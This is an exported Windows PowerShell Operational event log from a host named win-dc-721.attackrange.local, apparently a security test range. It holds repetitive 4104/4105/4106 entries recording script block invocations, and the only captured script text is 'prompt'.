ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477637
Keywords=None
Message=Started invocation of ScriptBlock ID: e0b9a6bc-5548-4650-801c-40cf49750120
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477636
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: e0b9a6bc-5548-4650-801c-40cf49750120
Path:
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477635
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477634
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477633
Keywords=None
Message=Completed invocation of ScriptBlock ID: 782cf29b-6645-4163-a9de-9b17055b3308
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477632
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477631
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477630
Keywords=None
Message=Started invocation of ScriptBlock ID: 782cf29b-6645-4163-a9de-9b17055b3308
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477629
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 782cf29b-6645-4163-a9de-9b17055b3308
Path:
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477628
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477828
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477827
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477826
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477825
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477824
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477823
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477822
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477821
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477820
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477819
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477818
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477817
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477816
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477815
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477814
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477813
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477812
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477811
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477810
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477809
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477808
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477807
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477806
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477805
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477804
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477803
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477802
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477801
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477800
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477799
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477798
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477797
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477796
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477795
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477794
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477793
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477792
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477791
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477790
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477789
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477788
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477787
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477786
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477785
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477784
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477783
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
